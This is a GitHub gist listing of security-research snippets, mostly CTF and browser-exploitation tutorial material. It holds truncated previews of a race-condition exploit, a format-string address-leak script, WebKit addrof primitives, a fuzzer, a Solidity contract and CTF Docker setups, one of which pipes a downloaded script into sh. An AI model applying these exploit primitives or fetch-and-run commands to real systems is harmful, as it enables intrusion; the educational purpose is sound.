Skip to content

Instantly share code, notes, and snippets.

View hireme.ipynb
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@LiveOverflow
LiveOverflow / readflag.c
Created Dec 18, 2019
File Path Race Condition
View readflag.c
#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/fs.h>
// source https://github.com/sroettger/35c3ctf_chals/blob/master/logrotate/exploit/rename.c
int main(int argc, char *argv[]) {
@LiveOverflow
LiveOverflow / asd.py
Last active Apr 23, 2021
C Application Firewall
View asd.py
import struct
import socket
s = socket.socket()
s.connect(('127.0.0.1', 1337))
r = s.recv(1024)
s.send("%p,%p,%p\n")
while ',' not in r:
r = s.recv(1024)
start_buf = int(r.split(',')[1], 16)-9
@LiveOverflow
LiveOverflow / test.js
Last active Jul 11, 2019
Revisiting JavaScriptCore Internals: boxed vs. unboxed - browser 0x06
View test.js
// based on: https://github.com/LinusHenze/WebKit-RegEx-Exploit
// tutorial: https://liveoverflow.com/tag/browser-exploitation/
// playlist: https://www.youtube.com/watch?v=5tEdSoZ3mmE&list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t
// addrof primitive
function addrof(val) {
var array = [13.37];
var reg = /abc/y;
// Target function
@LiveOverflow
LiveOverflow / test.js
Created Jun 22, 2019
Browser Exploitation - bowser 0x05
View test.js
// based on: https://github.com/LinusHenze/WebKit-RegEx-Exploit
// tutorial: https://liveoverflow.com/tag/browser-exploitation/
// playlist: https://www.youtube.com/watch?v=5tEdSoZ3mmE&list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t
// addrof primitive
function addrof(val) {
var array = [13.37];
var reg = /abc/y;
// Target function
@LiveOverflow
LiveOverflow / test.js
Last active Jun 22, 2019
Browser Exploitation - bowser 0x04
View test.js
// based on: https://github.com/LinusHenze/WebKit-RegEx-Exploit
// tutorial: https://liveoverflow.com/tag/browser-exploitation/
// playlist: https://www.youtube.com/watch?v=5tEdSoZ3mmE&list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t
// addrof primitive
function addrof(val) {
var array = [13.37];
var reg = /abc/y;
// Target function
@LiveOverflow
LiveOverflow / Dockerfile
Created May 18, 2019
ubuntu:18.04 CTF Docker
View Dockerfile
FROM ubuntu:18.04
ENV LC_CTYPE C.UTF-8
RUN apt-get update && apt-get install -y strace ltrace curl wget gcc net-tools vim gdb python python3 python3-pip wget git make procps libpcre3-dev libdb-dev libxt-dev libxaw7-dev python-pip && (wget -q -O- https://github.com/hugsy/gef/raw/master/scripts/gef.sh | sh) && pip install capstone && mkdir tools && cd tools && git clone https://github.com/JonathanSalwan/ROPgadget && pip3 install keystone-engine && pip3 install unicorn && pip3 install capstone && pip3 install ropper && pip3 install keystone-engine && pip install requests && pip install pwn && git clone https://github.com/radare/radare2 && cd radare2 && sys/install.sh && pip install r2pipe && dpkg --add-architecture i386 && apt update && apt install -y libc6:i386 libncurses5:i386 libstdc++6:i386 && wget https://developer.arm.com/-/media/Files/downloads/gnu-rm/7-2018q2/gcc-arm-none-eabi-7-2018-q2-update-linux.tar.bz2?revision=bc2c96c0-14b5-4bb4-9f18-bceb4050fee7?product=GNU%20Arm%20Embedded%20Toolchain,64-bit,,Lin
@LiveOverflow
LiveOverflow / fuzz.html
Created Apr 7, 2019
Fuzz innerHTML vs. DOMParser
View fuzz.html
<html>
<body>
<script>
const tags = ["a", "abbr", "address", "area", "article", "aside", "audio", "b", "base", "bdi", "bdo", "blockquote", "body", "br", "button", "canvas", "caption", "cite", "code", "col", "colgroup", "data", "datalist", "dd", "del", "details", "dfn", "dialog", "div", "dl", "dt", "em", "embed", "fieldset", "figcaption", "figure", "footer", "form", "h1", "h2", "h3", "h4", "h5", "h6", "head", "header", "hgroup", "hr", "html", "i", "iframe", "img", "input", "ins", "kbd", "keygen", "label", "legend", "li", "link", "main", "map", "mark", "math", "menu", "menuitem", "meta", "meter", "nav", "noscript", "object", "ol", "optgroup", "option", "output", "p", "param", "picture", "pre", "progress", "q", "rb", "rp", "rt", "rtc", "ruby", "s", "samp", "script", "section", "select", "slot", "small", "source", "span", "strong", "style", "sub", "summary", "sup", "svg", "table", "tbody", "td", "template", "textarea", "tfoot", "th", "thead", "time", "title", "tr", "track", "u", "ul", "var", "video", "wbr"]
View AcoraidaMonicaGame.sol
pragma solidity =0.4.25;
contract AcoraidaMonicaGame{
uint256 public version = 4;
string public description = "Acoraida Monica admires smart guys, she'd like to pay 10000ETH to the one who could answer her question. Would it be you?";
string public constant sampleQuestion = "Who is Acoraida Monica?";
string public constant sampleAnswer = "$*!&#^[` a@.3;Ta&*T` R`<`~5Z`^5V You beat me! :D";
Logger public constant logger=Logger(0x5e351bd4247f0526359fb22078ba725a192872f3);
address questioner;
string public question;
@LiveOverflow
LiveOverflow / docker-compose.yml
Last active Nov 8, 2020
flaglab - Real World CTF 2018
View docker-compose.yml
web:
image: 'gitlab/gitlab-ce:11.4.7-ce.0'
restart: always
hostname: 'gitlab.example.com'
environment:
GITLAB_OMNIBUS_CONFIG: |
external_url 'http://gitlab.example.com'
redis['bind']='127.0.0.1'
redis['port']=6379
gitlab_rails['initial_root_password']=File.read('/steg0_initial_root_password')